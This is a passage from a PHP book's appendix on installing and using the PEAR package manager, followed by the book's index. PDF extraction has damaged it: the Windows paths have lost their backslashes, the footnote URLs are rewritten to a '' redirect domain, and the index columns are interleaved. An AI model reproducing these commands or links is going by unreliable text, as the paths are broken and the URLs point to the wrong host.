      standardization throughout the PEAR library. For example, all error handling should
      be performed using PEAR::Error, and the code should be documented using the
      PHPDoc standard, which means that if you can’t find the API documentation on
      the PEAR web site, you should be able to extract it using phpDocumentor,6 which
      we covered in some detail in “How can I document my code for later reference by
      myself or others?” in Chapter 13.

      Be warned: the degree of integration between the packages within PEAR is currently
      fairly low when compared to, say, the Java class library. This means that, in some
      cases, you’ll be confronted with decisions such as whether to use
      PEAR::HTML_QuickForm’s validation functionality, or PEAR::Validate, or both. It’s
      a good idea to invest some time investigating which option fits your development
      style up-front, rather than jumping straight in and using a PEAR class for a critical
      part of your application, only to discover later that it wasn’t the best solution to the
      problem.

      One important point to be clear on is that a reference to PEAR can actually mean
      one of two things: the repository as a whole, or the PEAR front end (also known as
      the package manager), which provides tools for installing and upgrading the PEAR
      packages you use.

      You’re not required to use the PEAR package manager to install PEAR packages. If
      you need to, you can download them directly from the PEAR web site and manually
      extract them to your PHP’s include path. Make sure you check the dependencies
      listed on the site (these are other required packages) and be aware that most packages
      implicitly require the PEAR base package for tasks like error handling.7


      Installing PEAR
      These days, the foundations of PEAR are provided with the PHP distribution itself,
      but web hosts typically fail to provide customers with their own default PEAR in­
      stallations, so it’s worth knowing how to go about installing PEAR from scratch.
      The process can differ slightly between Unix- and Windows-based systems.


      6
          http://www.phpdoc.org/
      7
          http://pear.php.net/package/PEAR/
Appendix D: Working with PEAR         499

Step one is to make sure you can run PHP scripts via the command line. This is al­
ways possible if you type the full path to the PHP binary. For a Unix-based system,
you’d use the following:

    /usr/local/bin/php /home/username/scripts/my_script.php



For Windows, you’d use something like this:

    c:phpcliphp.exe c:scriptsmy_script.php



Note that in the Windows path above, we used the executable in the c:phpcli
(command line interface) subdirectory of the PHP installation. This executable be­
haves slightly differently from that used by Apache to handle web pages. PHP binary
releases for Windows since version 4.3.0 place the CLI version of the PHP executable
in this directory. We can make PHP much easier to use from the command line by
applying some changes to the system’s environment variables. For more information,
see the PHP CLI manual pages.8

Next, point your browser at http://go-pear.org/, where you’ll see a PHP script. This
script is used to install the PEAR package manager—the basis you’ll need in order
to install other PEAR packages. Download this to your computer and save it as go-
pear.php. From this point, you have a number of options.

Storing go-pear.php somewhere under your web server’s document root directory
will allow you to run the script as a web page. This behavior is still experimental,
though, so there are no guarantees it’ll work correctly. If you do use this approach,
make sure that the script is not publicly available!

A better option is to execute the go-pear.php script via the command line:

    /usr/local/bin/php /home/username/pear/go-pear.php



Here’s the command for Windows users:

    c:phpcliphp c:peargo-pear.php





8
    http://www.php.net/features.commandline/
500   The PHP Anthology

      This command will launch an interactive command line interface, which will ask
      you questions about how you would like PEAR installed. Note that the installation
      prefix is the directory in which PEAR (as well as any packages you install later)
      will be installed, and is referred to as $prefix; $php_dir contains the path to your
      PHP installation (in which go-pear.php will put PEAR-related documentation by
      default, unless you specify otherwise). Windows users should be aware that changing
      the installation prefix will cause a Windows Browse dialog to display; you can use
      it to specify the directory you require.

      With the installation options set to your requirements, the go-pear.php script will
      connect to the PEAR web site and download all the packages required to set up the
      package manager (it also asks if you require additional packages, which are well
      worth having). Packages are installed in a subdirectory, called pear, that’s within
      the directory you specified as the installation prefix. So, in the above examples,
      you’d end up with c:pearpear or /home/username/pear/pear).

      Finally, if you let it, the go-pear.php installer will attempt to modify your in­
      clude_path in php.ini. To do this manually, assuming you used the directories
      above, you’d specify the following:

       include_path = ".:/home/username/pear/pear"



      For Windows users, the path is as follows:

       include_path = ".;c:pearpear"



      Finally, to use the PEAR package manager from the command line, you’ll need to
      set up some environment variables. Windows users can automatically add these
      variables to their Windows registries by right-clicking on the file PEAR_ENV.reg and
      choosing Run from the menu that appears. The variables may also be manually
      configured as environment variables via the Windows Control Panel. Users of Unix­
      based systems can configure the variables to be set up every time they log in. To do
      so, they must edit the file .profile in the home directory (/home/username):

       #

       Environment variables

       export PHP_PEAR_SYSCONF_DIR=/home/username/pear

       export
Appendix D: Working with PEAR          501


 PHP_PEAR_INSTALL_DIR=/home/username/pear/pear

 export

 PHP_PEAR_DOC_DIR=/home/username/pear/pear/docs

 export

 PHP_PEAR_BIN_DIR=/home/username/pear

 export

 PHP_PEAR_DATA_DIR=/home/username/pear/pear/data

 export

 PHP_PEAR_TEST_DIR=/home/username/pear/pear/tests

 export

 PHP_PEAR_PHP_BIN=/usr/local/bin/php



Finally, you’ll need to add the PEAR command line script to your system path,
which, on Windows, can be achieved through the System Control Panel application
(on the Advanced tab, click Environment Variables). Simply append ;c:pear to the
PATH variable.

On Unix-based systems, add the following to the .profile script:

 export PATH=$PATH:/home/username/pear



Once you’ve done all that, you’re ready to move on and use the package manager.


The PEAR Package Manager
Assuming you’ve set up PEAR correctly, you can now use the command line interface
to the PEAR package manager to install packages. For example, take this command:

 pear install HTML_Common



This line will install the package HTML_Common from the PEAR web site. The package
names for the command line are the same as those on the web site.

The PEAR Package Manager uses XML_RPC to communicate with the PEAR web
site. If you’re behind a proxy server or firewall, you’ll need to tell PEAR the domain
name of the proxy server like so:

 pear config-set http_proxy proxy.your-isp.com



To unset the variable at some later stage, simply use this command:
502   The PHP Anthology


       pear config-set http_proxy ""



      To add HTML_QuickForm to the installed PEAR packages, you simply need to type
      the following:

       pear install HTML_QuickForm



      Should another release of HTML_QuickForm be made after you’ve installed it, you
      can upgrade the version with this command:

       pear upgrade HTML_QuickForm



      If, for some reason, you later decide you don’t need HTML_QuickForm any more, you
      can remove it using this line:

       pear uninstall HTML_QuickForm



      For a list of all the PEAR commands, simply type pear.

      Now, if you don’t like command lines, there’s also an (experimental) web-based
      front end to PEAR (there’s also a PHP-GTK front end, but it’s beyond the scope of
      this discussion). To use this tool, you need to install it from the command line, al­
      though if you executed go-pear.php through your web server, the web-based front
      end will already have been installed for you. To install the front end, type the fol­
      lowing commands:

       pear

       install Net_UserAgent_Detect

       pear install

       Pager

       pear install HTML_Template_IT

       pear

       install PEAR_Frontend_Web



      Note that the first three packages we’ve specified here are required by
      PEAR_Frontend_Web. Now you can launch the front end from your web server using
      the following simple script:
Appendix D: Working with PEAR           503


    <?php

    // Optional if include path not set

    # ini_set('include_path','c:htdocsPEAR');


    require_once 'PEAR.php';


    //For Windows users

    # $pear_user_config = 'c:windowspear.ini';


    //For Unix users

    $pear_user_config = '/home/username/pear/pear/PEAR/pear

    ➥.conf';

    $useDHTML = true; // Switch off for older browsers

    require_once 'PEAR/WebInstaller.php';

    ?>




Installing Packages Manually
It’s possible to install PEAR packages manually (although this involves more work),
but it’s important to watch the include paths carefully when you’re doing so. First
of all, create a directory that will be the base of all the PEAR classes you install,
making sure that this directory is in your include path. Next, install the main PEAR
package.9 Download the latest stable version and extract it directly to the directory
you’ve created, so that PEAR.php is in the root of this directory.

Installing further packages can be completed in more or less the same fashion, but
you need to be careful to choose the correct directories when you’re extracting the
various files. For example, if you’re installing PEAR::DB, the main DB.php file goes
alongside the PEAR.php file in the root of the PEAR class directory, while further
PEAR::DB-related files belong in the subdirectory DB. The best way to check that
you’ve selected the appropriate directories is to look at the package.xml file that
comes with every PEAR package. There you’ll find an element called filelist,
which lists all the files contained in the package and the locations at which they
should be installed. For each file, check the baseinstalldir attribute—if it’s spe­
cified, it will tell you where the file should be placed relative to the root PEAR class
directory. The name attribute specifies the path and filename, relative to the



9
    http://pear.php.net/package/PEAR/
504   The PHP Anthology

      baseinstalldir (or just the root PEAR class directory if there’s no baseinstalldir
      attribute), where each file should be placed.


      Alternatives to PEAR
      Many repositories of reusable PHP classes are available. Some web sites, such as
      PHP Classes,10 offer user-contributed work for download, while others, such as eZ
      Components,11 manage their own code base of reusable classes that can be down­
      loaded as a package.

      For more tightly integrated repositories of code, you might like to investigate the
      numerous rapid application development frameworks available, such as the Zend
      Framework12 and CakePHP.13

      It’s not within the scope of this book to cover any of these frameworks in depth, or
      comment on which will best suit your needs, but on the whole, reusing code from
      any of these sources, including PEAR, can save you development time and allow
      you to concentrate on writing software that solves your needs, rather than rewriting
      basic components for every project.

      Note, however, that some overhead is involved when you’re starting out with code
      from repositories and frameworks. Writing all your code from scratch might be the
      fastest solution in the short term, but selecting and becoming fluent with one repos­
      itory or framework will help decrease your development time in the medium term,
      and will benefit anyone that writes more than one web site. You’ll also find that
      selecting the right framework will make it easier for other developers to come up
      to speed when they’re working on the sites you create. Also, avoid switching devel­
      opment environments frequently, as this will reset your learning curve and might
      adversely affect your productivity.

      Finally, remember that when you use code from any repository that accepts public
      contributions with little or no requirement for quality control, you might be opening
      yourself up to all sorts of problems, from security vulnerabilities to reliance on stale
      and unmaintained components.


      10
         http://www.phpclasses.org/
      11
         http://ez.no/ezcomponents/
      12
         http://framework.zend.com/
      13
         http://www.cakephp.org/
Index
                                           aggregation

Symbols                                       about, 23

$_SESSION, 278, 281
                       agile documentation

$this variable, 15, 32
                       about, 459

.forward file, 191
                        allow_url_fopen, 477

.htaccess file, 473
                       anti-spam (see spam legislation)

.ini files
                                Apache web server

   storing configuration information, 164
    caching, 367

                                              hosting support, 483

A                                             HTTP authentication, 271

abstract classes
                             PHP installation, 485

   about, 27
                              APIs

abstract methods
                             about, 13

   about, 28
                                 callback arguments, 353

AcceptPathInfo
                               documenting, 448

   "pretty" URLs, 140
                        REST web services, 429

access
                                    arguments

   to cron utility, 485
                      overriding properties, 21

   files on remote servers, 166–167
       arrays

   to SSH, 484
                               of lines, 86–88

   URLs, 495
                                 reading files as, 149

access control, 269–362
                      strings, 78

   changing passwords, 330–338
            asp_tags, 477

   forgotten passwords, 318–330
           assertions

   HTTP authentication, 271–277
              testing framework, 461

   permission systems, 339–353
            attachments

   private sections of web sites, 283–297
    adding to email messages, 184–186

   registration systems, 297–318
          Auth class, 283

   session classes, 281–282
               authentication

   storing sessions in databases, 353–362
    (see also HTTP authentication)

   using sessions, 277–281
                   defined, 295

AccountMaintenance class, 319, 331
           security, 494

adding
                                    authentication headers, 275

   data in databases, 53–55
               authorization

                                              defined, 296
506

      authorization header, 276              Cache_Lite_Function class, 391
      auto_append_file, 478                  caching, 363–393
      auto_prepend_file, 478                    client-side, 367–371
      auto-commit mode                          examining HTTP headers in web
        default mode, 66                              browsers, 371–372
      autoincrementing field                    file downloads with Internet Explorer,
        determining INSERT's row number,              372–373
              62–63                             function calls, 390–392
                                                output buffering for server-side cach­
      B                                               ing, 373–377
      back-ups                                  parts of pages, 377–381
         database, 69–75                        PEAR::Cache_Lite configuration op­
      bandwidth                                       tions, 385–389
         reading files, 152                     purging Cache_Lite cache, 389–390
      bar graph                                 using PEAR::Cache_Lite for server-
         creating, 224                                side caching, 382–385
      batch jobs                             calendars
         scheduling, 485                        creating, 102–107
      behavioral testing                     call_time_pass_reference, 476
         about, 459                          callbacks
      branches                                  arguments, 353

         revision control software, 438         error handler prototype, 242

      bridge tables                          CAPTCHA (Completely Public Turing
         about, 340                                Test to Tell Computers and Hu­
      browsers (see Internet Explorer; web         mans)
            browsers)                           image verification, 234
      buffering (see output buffering)       CGI mode, 485
      build systems                          change password form
         developing code, 470                   example of, 333
                                             changesets
      C                                         revision control software, 437
      cache files                            characters (see escape characters; wild­
        protecting, 385                            card characters)
      Cache_Lite (see PEAR::Cache_Lite)      charts
      Cache_Lite cache                          displaying, 223–230
        purging, 389–390
507

classes                                     configuration, 473–481

   (see also abstract classes; PEAR; spe­      documentation about, 3

          cific classes)
                      PEAR::Cache_Lite, 385–389

   about, 10
                                  for portable code, 33

   access control for sections of web
         settings, 286

          sites, 283–297
                      storing configuration information in

   repositories of reusable PHP classes,
            files, 163–165

          504
                              configuration files

client-side caching
                           used in access control examples, 270

   controlling, 367–371
                    constructors

code
                                          Auth class, 284

   (see also source code)
                     defined, 14

   coding standards, 446
                      overriding, 22

   deploying, 468–471
                      content
   documenting, 448–453
                       searching for in XML, 409–412

   maintaining multiple versions, 438–
     content-disposition header, 170

          441
                              content-length header, 171

   reuse, 9
                                Content-Type header, 170, 198

   revising old code, 467–468
              control (see access control; error hand­

   testing framework, 454–462
                    ling)

   tracking revisions, 436–438
             COUNT function

   writing distributable code, 441–448
        rows returned from a SELECT call, 60

   writing portable code, 33–38
            credentials

code coverage reports, 463
                    passing in DSN, 44

command line
                               cron utility

   use of, 485, 486
                           access to, 485

communications
                             cross-site request forgery (CSRF)

   security, 495
                              about, 493

composition
                                cross-site scripting (XSS), 83

   about, 25
                                  about, 489–491

compressing
                                   session security, 281

   database data, 174
                      cryptographic storage

   files, 172–174
                             security, 495

concatenation
                              CURRENT_TIMESTAMP function, 108

   strings, 78

Concurrent Versioning System (CVS),

      437
508


      D                                         DATE_FORMAT function, 109
                                                DATE_SUB function, 111
      data
                                                dates and times, 95–113
        compressing in databases, 174
                                                   (see also HTTP dates)
        outputting in table, 127–129, 130–133
                                                   calendars, 102–107
      data grids
                                                   current, 98–99
        customized, 134–139
                                                   date calculations using MySQL, 111–
      data types
                                                         112
        strings, 77
                                                   days of the week, 101
      database connections
                                                   formatting MySQL timestamps, 109–
        setting up, 311
                                                         110
      database servers
                                                   number of days in month, 101–102
        port numbers, 44
                                                   storing dates in MySQL, 107–109
      database transactions
                                                   Unix timestamps, 96–98
        defined, 66
                                                days
      databases, 39–75
                                                   in a month, 101–102
        accessing, 41–44
                                                   of week, 101
        adding or modifying data, 53–55
                                                defaults
        backing-up, 69–75
                                                   error mode, 50
        compressing data, 174
                                                   mode in PDO, 66
        errors in SQL queries, 49–52
                                                deploying
        escape characters, 80
                                                   code, 468–471
        fetching data from tables, 44–49
                                                destructors
        flexible SQL statements, 57–59
                                                   defined, 14
        INSERT's row number using autoincre­
                                                dir pseudo-class, 161
              menting field, 62–63
                                                direct object references
        PDO, 40–41
                                                   security, 491
        permission systems, 339
                                                directories
        rows affected by SQL queries, 59–61
                                                   examining, 160–161
        searching tables, 63–64
                                                DirectoryIterator class, 174
        SQL injection attacks, 55–57
                                                display_errors directive, 240, 261, 477
        storing sessions, 353–362
                                                displaying (see outputting)
        transactions, 65–67
                                                distributed systems
      DatabaseSession class, 354, 361
                                                   revision control software, 437
      date function, 99, 101, 371
                                                docblocks
      DATE_ADD function, 111
                                                   about, 449
      date_default_timezone_set function, 99
509

documentation                              email injection attacks, 193–195
  (see also agile documentation)           encapsulation
  code, 448–453                               about, 13
  for PHP, 2–9                             environmental errors
  test suites as, 453                         defined, 237
DOM                                        environmental PHP errors
  generating XML, 407                         handling as exceptions, 260
DOM functions                              ERRMODE_EXCEPTION, 51
  navigating XML, 405                      ERRMODE_SILENT, 50
DOM XML extension, 397                     ERRMODE_WARNING, 50
downloads                                  error handling, 237–268
  caching files with Internet Explorer,       custom error handlers, 242–247
        372–373                               custom exception class, 252–257
DSN (Data Source Name)                        custom exception handler, 257–260
  about, 43                                   displaying errors and exceptions, 261–
dynamic SQL                                         265
  sprintf function, 59                        E_STRICT constant, 173
dynamic web pages                             error levels reported, 238–240
  caching, 363                                handling as if they were exceptions,
                                                    260–261
E                                             logging and reporting, 247–248
E_ERROR error level, 240                      redirecting to another page, 265–267
E_NOTICE error level, 240                     security, 493
E_STRICT error level, 173, 181, 240, 293      settings, 239–241, 480
E_USER_ERROR error level, 240, 242            SQL queries, 49–52
E_USER_NOTICE error level, 240, 241           triggering errors, 241–242
E_USER_WARNING error level, 240, 242          using exceptions for, 248–252
E_WARNING error level, 240                 error notices
email, 179–196                                JpGraph, 224
  adding attachments, 184–186              error_log, 480
  email injection attacks, 193–195         error_log directive, 241
  generating complex emails, 182–184       error_log function, 263
  groups, 188–191                          error_reporting directive, 239, 477
  incoming email, 191–193                  escape characters
  sending files, 171                          in databases, 80
  sending HTML email, 186–188              exception class, 252–257
  sending simple email, 179–182
510

      exception classes                          fields (see auto-incrementing field; form
        defining, 300                                   fields)
      exception handlers                         file execution attacks, 491
        implementing, 257–260                    file handles
      exception mode                                using, 153–155
        errors in SQL queries, 51                file pointers
      exceptions                                    using, 153
        displaying, 261–265                      file_get_contents function, 150
        handling errors as if they were excep­   file_put_contents function, 156
               tions, 260–261                    files, 147–177
        using for error handling, 248–252           (see also specific files; ZIP utility)
      execution                                     accessing information about local
        settings, 475–479                                  files, 157–159
      EXIF information                              accessing on remote servers, 166–167
        extracting, 217–220                         caching downloads with Internet Ex­
      exif_read_data function, 218                         plorer, 372–373
      Expires header, 371                           creating compressed ZIP/TAR files,
      Expires meta tag, 366                                172–174
      explode function, 86                          examining directories, 160–161
      extension, 481                                FTP, 167–169
      extension_dir, 481                            managing downloads, 170–172
      extensions                                    modifying local files, 155–156
        available from hosting service, 486         outputting source code online, 161–
        documentation about, 5                             163
        XML, 396–398                                reading local files, 148–152
      extracting                                    SPL, 174–177
        files, 173                                  storing configuration information in,
                                                           163–165
      F                                          fonts (see TrueType fonts)
      fatal errors                               form fields
         handling as exceptions, 260                prepopulating, 80
      features                                   formatting
         documentation about, 4                     dates, 96
      fetchObject method                            MySQL timestamps, 109–110
         prepare and execute, 49                    output text, 88–90
                                                    strings, 81–82
511

forms (see HTML forms)                       hinting (see type hinting)
FTP (File Transfer Protocol)                 hints
   using, 167–169                               passwords, 319

function calls                               hosting

   caching, 390–392                             checklist, 483–487
functions
                                   HTML
   (see also specific functions)
               meta tags, 365

   file information, 157
                    HTML email

fwrite function, 156
                           sending, 186–188
                                             HTML forms
G                                               building, 116–127
galleries (see thumbnail galleries)          HTML tags
generating                                      stripping from text, 82–83

   (see also sending)                        HTML_QuickForm class, 117

   complex emails, 182–184                   HTML_Quickform package, 309, 325

GNU Make, 470
                               HTML_Table class, 127

graphical watermarks
                        HTML_Table_Matrix class, 102

   displaying, 221
                          htmlentities function, 80

graphs
                                      HTTP authentication

   displaying, 223–230                          about, 271–277

grids (see data grids)                       HTTP Authentication package, 276

groups                                       HTTP dates

   email, 188–191                               calculation of, 371

                                             HTTP headers

H                                               caching, 365

handles (see file handles; file pointers)
      examining in web browsers, 371–372
header lines
                                   file downloads, 170

   email injection attacks, 193
                output buffering, 377

headers (see authentication headers; au­     HTTP response headers, 278

     thorization header; Expires header;     http.conf file

     HTTP headers; request headers;             hotlinking images, 231

     page expiry headers)
help (see documentation)
                    I

highlight_file function, 162
                ignore_repeated_errors, 480

highlight_string function, 161
              ignore_repeated_source, 480

                                             imagecopyresampled function, 201

                                             images, 197–236
512

         charts and graphs, 223–230
            interpolation

         EXIF information, 217–220
                (see also variable interpolation)

         hotlinking, 230–234
                      strings, 77

         human verification, 234–235
           INTERVAL keyword, 111

         MIME type, 198–199

         resizing, 202–213
                     J
         thumbnail galleries, 214–217
          jobs (see batch jobs)

         thumbnails, 199–202
                   JpGraph library, 223

         watermarks, 220–223

      implode function, 87
                     L
      include_path, 478
                        LAMP

      includes
                                    hosting support, 483

         settings, 475–479
                     levels

      incoming email
                              errors, 238–240

         handling, 191–193
                     LIKE operator

      information leakage
                         searching tables, 63

         security, 493
                         lines

      inheritance
                                 arrays of, 86–88

         about, 17
                             Linux

      ini_alter, 474
                              dates, 97

      ini_set, 474
                                hosting support, 483

      injection flaws, 491
                        session security, 280

      INSERT function
                          listInsertId method

         data into databases, 53
                  using, 62

         determining row number with
           local files
               autoincrementing field, 62–63
      accessing information about, 157–159
      installation
                                modifying, 155–156
         documentation about, 3
                   reading, 148–152
         PEAR, 498–504
                         localhost
         PHP on Apache web server, 485
            connecting to MySQL databases, 41

         Zend Framework, 395
                   log_errors, 241, 480

      interfaces
                               logging

         (see also object interfaces)
             errors, 247–248

         defined, 27
                           logic errors

      Internet Explorer                            defined, 238

         caching file downloads, 372–373
513

login
                                     multi-processing module (MPM)

   magic quotes, 288
                        hosting support, 484

                                           MultiViews

M                                            "pretty" URLs, 140

magic methods
                             MyISAM engine

  about, 14
                                 performance, 361

magic quotes
                              MySQL

  checking for, 37
                          calculating dates, 111–112

magic_quotes_gpc, 288, 476
                  MyISAM engine performance, 361

mail function, 180
                          stored procedure example, 68–69

Mail_mime package, 309, 325
                 storing dates, 107–109

max_execution_time, 478
                   MySQL databases

MD5 algorithm
                               connecting to on localhost, 41

  passwords, 286
                          MySQL timestamps

  security, 495
                             formatting, 109–110

member variables (see properties)
         mysql_real_escape_string function, 80

memory_limit, 479
                         MySQLDump class

meta tags
                                   operating system configuration, 70

  caching, 365
                              using, 72

methods

  (see also abstract methods; magic
       N
        methods; static methods)
          namespaces

  about, 11
                                 choosing, 445

  overriding, 20
                            defined, 413

Microsoft Windows (see Windows)            nodes
MIME type                                    searching for in XML, 409–412
  specifying, 198–199
                     non-distributed systems
mktime function, 97
                         revision control software, 437

mod_rewrite
                               “notice” error messages, 186

  "pretty" URLs, 141
                      NOW function, 108

  hotlinking images, 231

modes (see exception mode; silent mode;
   O
     warning mode)
                        object interfaces

modifying                                    about, 29

  data in databases, 53–55                 object oriented programming (OOP)

  local files, 155–156                       about, 9–33
514

        using, 442
                                preventing web browsers from cach­
      object type hinting, 249
                          ing, 365–367
      objects
                                   parsing

        creating, 14
                              RSS feeds, 398–405

        treating as strings, 16
                   XML with XMLReader, 399

      open source
                               passing

        revision control software, 437
            credentials in DSN, 44

      Open Web Application Security Project
     passwords

           (OWASP), 489
                           changing, 330–338

      open_basedir, 477
                           forgotten, 318–330

      operating systems
                           MD5 algorithm, 286

        MySQLDump class, 70
                       security, 494

      output buffering
                          PDO (PHP Data Object)

        caching parts of pages, 378
               about, 40–41

        displaying errors and exceptions, 261
     auto-commit mode, 66

        server-side caching, 373–377
            PEAR, 497–504

      outputting                                   alternatives to, 504

        charts and graphs, 223–230                 installing, 498–504

        data in table, 127–129, 130–133          PEAR Coding Standards, 446

        errors and exceptions, 261–265           PEAR package manager, 501–503

        formatted text, 88–90                    PEAR packages

        source code online, 161–163                PHP 5 E_STRICT compliance, 293

        strings, 79–81                           PEAR::Cache_Lite
      overloading
                                 configuration options, 385–389
        servers, 484
                              server-side caching, 382–385
      overriding
                                PEAR::HTML_QuickForm package, 297

        constructors, 22
                        PEAR::Mail class, 182

        methods and properties, 20
              PEAR::Mail package, 180

                                                 PEAR::Mail_Mime class, 182, 184, 186, 

      P                                               188, 297

      packet sniffers
                           PEAR::Net_FTP class, 168

        data security, 270
                      PEAR::Validate class, 90

      page expiry headers
                       performance

        setting, 367
                              MyISAM engine, 361

      pages
                                     permissions

        caching parts of, 377–381
                 files on Unix-based Web servers, 156
515

permissions systems                 programming errors

   building, 339–353
                 defined, 237

Phing, 470
                         properties

php.ini file
                         (see also static properties)

   configuration, 473
                about, 11

   date.timezone setting, 99
         overriding, 20

   error handling settings, 242
    protected visibility

   error logging settings, 247
       defined, 13

   safe_mode, 486
                  protecting

phpDocumentor, 449
                   cache files, 385

phpinfo function, 485
              prototypes

phpt testing framework, 456, 460
     error handlers, 242

PHPUnit, 456, 461
                  proxy servers

pie charts
                           caching, 366

   creating, 227
                   public interfaces (see APIs)

placeholders
                       public visibility

   date function, 100
                defined, 13

pointers (see file pointers)
       purging

polymorphism
                         Cache_Lite cache, 389–390

   about, 27

port numbers
                       Q
   database servers, 44
            Query method

portability
                          PDO database access, 45

   settings, 475–477

post_max_size, 479
                 R
prepare and execute methods
        read function, 356

   PDO database access, 46
         readCache function, 378

   SQL injection attack, 55
        readdir function, 160

prepopulating
                      readfile function, 152, 170

   form fields, 80
                 reading

preserve state, 277
                   local files, 148–152

"pretty" URLs, 139–145
             realm

printf function, 89
                   HTTP authentication, 276

printing (see outputing)
           redirecting

private implementation
                to another page, 265–267

   defined, 13
516

      refactoring                       rules (see validation rules)
         about, 467

      register_globals, 36, 476
        S
      registration forms
               safe_mode, 486

         example of, 317
               SAX

      registration systems
                parsing RSS feeds, 404

         building, 297–318                 XML extension, 397

      relational databases              scalar

         PHP support for, 39
              strings, 77

      remote servers
                   scheduling

         accessing files on, 166–167       batch jobs, 485

      replace operations                screening

         advanced, 84–86
                  web site visitors, 297

      report_memleaks, 480
             scripts (see stored procedures)

      reporting
                           handling incoming email, 191

         (see also error handling)         hosting policy, 485

         errors, 247–248                search operations
      repositories                         advanced, 84–86
         layout, 438
                   searching
         reusable PHP classes, 504
        for nodes or content in XML, 409–412
      request headers, 368
                tables, 63–64
      resellers
                        security, 489–496

         hosting services, 484
            data transmission, 269

      reserved words, 341
                 documentation about, 4

      resetting
                           email injection attacks, 193–195

         passwords, 325
                   files, 148, 156, 165

      resizing
                            hiding code, 163

         images, 202–213                   sessions, 280

      REST web services                    settings, 475–477

         consuming, 425–431             SELECT call

         serving, 431–433                  number of rows returned, 60

      revision control software (RCS)   sending
         about, 436–438                    (see also generating)
      RSS feeds                            email to groups, 188–191
         generating, 405–409               HTML email, 186–188
         parsing, 398–405                  simple email, 179–182
517

servers                                     SimpleXML
   (see also Apache web server; database       parsing RSS feeds, 398
         servers; proxy servers; remote        REST web services, 426
         servers; web servers)                 XML extension, 397
   displaying errors, 261
                  SOAP web services
   overloading, 484
                           consuming, 420–422
   session files, 280
                         serving, 423–425
   swapping, 279
                           SOAP XML extension, 398
server-side caching                         SoapClient class, 421
   output buffering, 373–377                source code
   using PEAR::Cache_Lite for, 382–385         outputting online, 161–163
services (see web services; XML)            spam legislation
session class, 281–282                         about, 190
session management                          SPL (Standard PHP Library)
   security, 494                               using, 174–177
session.save_path, 481                      sprintf function, 89
session.use_cookies, 481                       dynamic SQL, 59
session_regenerate_id function, 494         SQL, 44–61
sessions                                       adding or modifying data in databases,
   storing, 279                                      53–55
   using, 231, 277–281                         errors, 49–52
set_error_handler function, 243, 257, 260      fetching data from tables, 44–49
set_exception_handler function, 257            flexible SQL statements, 57–59
settingAllowOverride, 486                      rows affected by a query, 59–61
settings, 475–481                              stored procedures, 67–69
   configuration, 286                       SQL injection attacks
   error handling, 239–241, 242, 480           about, 491
   includes and execution, 475–479             prepare and execute methods, 55
   miscellaneous, 481                          protecting from, 55–57
   security and portability, 475–477        SSH
short_open_tag, 476                            access to, 484
SignUp class, 299                           SSL
signup page                                    security, 495
   creating, 308                            standards
silent mode                                    coding, 446
   errors in SQL queries, 50                static methods
SimpleTest, 456, 461                           about, 31
518

         validating strings, 90
                   Structures_DataGrid class, 134

      static properties
                           Subversion (SVN), 436, 437

         about, 31
                                swapping

      stored procedures
                              servers, 279

         cross-site scripting security exploit,
   symlinks

               83
                                    deploying code, 468

         using with PDO, 67–69
                    syntax errors

      storing
                                        defined, 237

         configuration information in files,

               163–165
                            T
         cryptographic data, 495
                  tables
         dates in MySQL, 107–109
                     fetching data, 44–49
         sessions elsewhere from server, 279
         outputting data, 127–129, 130–133
         sessions in databases, 353–362
              searching, 63–64
      str_replace function, 85
                    tags
      streams
                                        deploying code, 468

         accessing files, 166
                        revision control software, 438

      string functions
                            TAR files

         using XML extension instead of, 396–
        creating, 172–174
               398
                                template caching
      strings, 77–94
                                 about, 376

         breaking up text into arrays of lines,
   ternary operators

               86–88
                                 reading files as arrays, 149

         formatting, 81–82
                        Test Driven Development (TDD)

         outputting formatted text, 88–90
            defined, 462

         outputting safely, 79–81
                 test environments, 461

         reading files as, 150
                    test pages

         search and replace, 84–86
                   permission systems, 349

         stripping HTML tags from text, 82–83
     test suites

         treating objects as, 16
                     as documentation, 453

         trimming white space, 88
                 testing

         validating submitted data, 90–94
            code coverage, 463–467
         wrapping text, 84
                        text
      strip_quotes.php file, 91
                      arrays of lines, 86–88
      stripping
                                      outputting, 88–90
         HTML tags from text, 82–83
                  trimming white space, 88

      strtotime function, 101, 102
                   wrapping, 84
519

text watermarks                     uptime command, 484
   displaying, 220                  URLs
threaded multi-processing module       "pretty", 139–145
      (MPM)                            access, 495
   hosting support, 484                direct object reference attacks, 491
thumbnail galleries                 User class, 343
   creating, 214–217                utilities (see cron utility; ZIP utility)
thumbnail images
   creating, 199–202                V
times (see dates and times)         validation rules
timestamps (see MySQL timestamps;      forms, 120
      Unix timestamps)              variable interpolation
tracking                               strings, 77
   code revisions, 436–438          variables
transactions                           constructing SQL statements, 57
   databases, 65–67                 verification
trigger_error function, 241            of images by humans, 234
triggering                          versions
   errors, 241–242                     multiple code, 438–441
trimming                            visibility
   white space from text, 88           defined, 13
TrueType fonts
   JpGraph, 225                     W
type hinting                        warning mode
   about, 25                          errors in SQL queries, 50
types                               watermarks
   data, 77                           adding to images, 220–223
                                    web browsers
U                                     (see also Internet Explorer)
Unix                                  examining HTTP headers, 371–372
  session security, 280               preventing from caching pages, 365–
Unix timestamps                             367
  using, 96–98                      web hosting (see hosting)
UPDATE function                     web pages (see pages)
  data into databases, 54           web servers
upgrades                              (see also Apache web server)
  hosting service policy, 486
520

        caching, 364
                             generating RSS feeds, 405–409

        preventing web browsers from caching
     parsing RSS feeds, 398–405

              pages, 365–367
                     REST web services, 426

      web services, 412–434
                      searching for nodes or content, 409–

        (see also XML)
                                412

        consuming REST, 425–431
                XMLReader

        consuming SOAP, 420–422
                  parsing XML, 399

        consuming XML-RPC services, 412–
       XMLReader class, 397

              416
                              XML-RPC web services

        serving REST, 431–433
                    consuming, 412–416

        serving SOAP, 423–425
                    serving, 416–420

        serving XML-RPC, 416–420
               XML-RPC XML extension, 398

      week
                                     xmlrpc_encode_request function, 414

        day of, 101
                            XMLWriter class, 397

      WHERE clause
                               generating XML, 408

        UPDATE and DELETE SQL com­
             XPath

              mands, 61
                          searching XML, 410

      whitespace
                               XPath XML extension, 397

        trimming, 88
                           XSL XML extension, 397

      wildcard characters
                      XXS (see cross-site scripting)

        about, 64

      Windows
                                  Z
        dates, 97
                              Zend Framework

        MySQLDump class, 72
                      coding standards, 447

      wordwrap function, 84
                      installing, 395

      wrapper class, 281
                         REST web service, 430

      wrapping
                                   XML-RPC, 413

        text, 84
                               Zend_Feed class

      write function, 357
                        SimpleXML, 403

      writeCache function, 378
